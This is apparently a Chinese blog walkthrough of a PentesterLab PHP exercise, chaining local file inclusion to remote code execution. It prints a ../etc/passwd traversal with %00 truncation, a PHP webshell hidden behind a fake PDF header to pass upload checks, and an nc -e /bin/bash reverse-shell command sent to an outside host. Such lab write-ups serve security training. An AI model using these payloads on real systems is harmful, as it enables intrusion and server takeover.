PentesterLab-PHP Include And Post Exploitation

Posted 2021-01-06 zlgxzswjy

一、打开页面，看到这么个页面，按照惯例随手点一点

二、Login处显然是一个后台登录页面，但前提是的有账号密码，看了下Submit这个页面，发现url中有个page参数

三、nikto跑一下这个页面。里面有这么一条信息很有意思

+ /index.php?page=../../../../../../../../../../etc/passwd: PHP include error may indicate local or remote file inclusion is possible.

看样子这个地方可能存在文件包含，把nikto这个结果拿过去请求一下

发现确实有个include函数，但是里面的文件名后面自动添加了一个.php，想到可以%00截断，请求以下链接，显示除了passwd文件内容，看来没有做限制，下面就去找利用点

/index.php?page=../../../../../../../../../../etc/passwd%00

四、这里有个提交功能，写了一个简单地php 一句话木马，放到test.php直接上传，提示只能是PDF文件

试着抓包修改后缀名和Content-Type，都无法上传，看来服务端可能是判断了文件头经过多次尝试发现，只有当后缀名为.pdf且文件头也为pdf文件头时，才能上传。创建test.pdf文件，内容如下

%PDF-1.5
<?php system($_GET[‘cmd‘]);?>

成功上传，这里文件第一行用于伪造pdf文件头。

五、用上传时的用户名密码登录后台，看到上传的pdf下载链接，上传到了uploads目录，复制，回到最开始的页面，page参数改为这个链接，成功包含文件，但出现报错，缺少cmd参数

http://192.168.109.131/index.php?page=uploads/k.pdf%00

六、带上cmd参数，向我们的服务器反弹一个shell回来

/index.php?page=uploads/k.pdf%00&cmd=nc%20x.x.x.x%209999%20-e%20/bin/bash

成功getshell